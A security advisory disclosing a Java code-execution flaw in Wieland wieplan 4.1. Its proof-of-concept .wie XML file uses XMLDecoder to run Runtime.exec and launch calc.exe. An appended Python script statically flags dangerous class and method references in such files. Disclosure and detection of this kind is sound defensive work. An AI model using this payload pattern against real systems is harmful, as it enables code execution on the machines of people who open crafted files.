Wieland wieplan 4.1 Document Parsing Java Code Execution Using XMLDecoder


Vendor: Wieland Electric GmbH
Product web page: http://www.wieland-electric.com
Affected version: 4.1 (Build 9)

Summary: Your new software for the configuration
of Wieland terminal rails. wieplan enables you to
plan a complete terminal rail in a very simple way
and to then place an order with Wieland. The configured
terminal rail can be stored in DXF format and read
into a CAD tool for further processing. Due to the
intuitive user interface, the configuration of terminal
rails with wieplan is easy.

Desc: wieplan suffers from arbitrary Java code
execution when parsing WIE documents, which it loads
with java.beans.XMLDecoder, allowing system access to
the affected machine. The software is used to generate
custom specification orders saved as .wie XML files,
which have to be sent to the vendor offices to be
processed.

Tested on: Microsoft Windows 7 Professional SP1 (EN)
           Microsoft Windows 7 Ultimate SP1 (EN)
           Java/1.8.0_73
           Java/1.6.0_62


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2016-5304
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5304.php


25.11.2016


---


<?xml version="1.0" encoding="UTF-8"?>
<java version="1.6.0_02" class="java.beans.XMLDecoder">
 <object class="java.lang.Runtime" method="getRuntime">
  <void method="exec">
   <string>c:\\windows\\system32\\calc.exe</string>
  </void>
 </object>
</java>
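As an added example (not part of the advisory and not code from wieplan or the vendor), a Python triage script that statically inspects a .wie document before anything hands it to XMLDecoder: it flags every class and method reference outside an allowlist, so a file shaped like the PoC above is quarantined by the recipient rather than executed. The allowlist contents and the two sample documents are constructed assumptions, since the real .wie vocabulary is not documented here.

```python
"""Static triage of a .wie (java.beans.XMLDecoder) document before it is opened."""
import xml.etree.ElementTree as ET
from typing import List

# Assumption: classes a benign wieplan order may reference; adjust to the real schema.
ALLOWED_CLASSES = {"java.lang.String", "java.util.ArrayList", "java.util.HashMap"}
# Classes and methods that have no business in a configuration document.
DANGEROUS_CLASSES = {"java.lang.Runtime", "java.lang.ProcessBuilder", "java.lang.System"}
DANGEROUS_METHODS = {"exec", "start", "load", "loadLibrary"}


def audit_wie(xml_text: str) -> List[str]:
    """Return a list of findings for one .wie document; an empty list means clean."""
    findings: List[str] = []
    try:
        root = ET.fromstring(xml_text.encode("utf-8"))  # bytes keep the XML declaration legal
    except ET.ParseError as exc:
        return [f"unparseable XML: {exc}"]
    if root.tag != "java" or root.get("class") != "java.beans.XMLDecoder":
        findings.append("root is not a java.beans.XMLDecoder document")
    for el in root.iter():  # walk every <object>/<void>/... element
        cls, meth = el.get("class"), el.get("method")
        if cls and cls != "java.beans.XMLDecoder" and cls not in ALLOWED_CLASSES:
            level = "DANGEROUS" if cls in DANGEROUS_CLASSES else "unlisted"
            findings.append(f"{level} class reference: {cls}")
        if meth in DANGEROUS_METHODS:
            findings.append(f"dangerous method call: {meth}")
    return findings


# Constructed sample: a harmless order using only allowlisted types.
BENIGN_WIE = """<?xml version="1.0" encoding="UTF-8"?>
<java version="1.6.0_02" class="java.beans.XMLDecoder">
 <object class="java.util.ArrayList">
  <void method="add"><string>rail-segment-1</string></void>
 </object>
</java>"""

# Constructed sample with the same shape as the advisory's PoC (Runtime.exec chain).
MALICIOUS_WIE = """<?xml version="1.0" encoding="UTF-8"?>
<java version="1.6.0_02" class="java.beans.XMLDecoder">
 <object class="java.lang.Runtime" method="getRuntime">
  <void method="exec"><string>calc.exe</string></void>
 </object>
</java>"""

if __name__ == "__main__":
    for name, doc in (("benign", BENIGN_WIE), ("malicious", MALICIOUS_WIE)):
        print(name, "->", audit_wie(doc) or "clean")
```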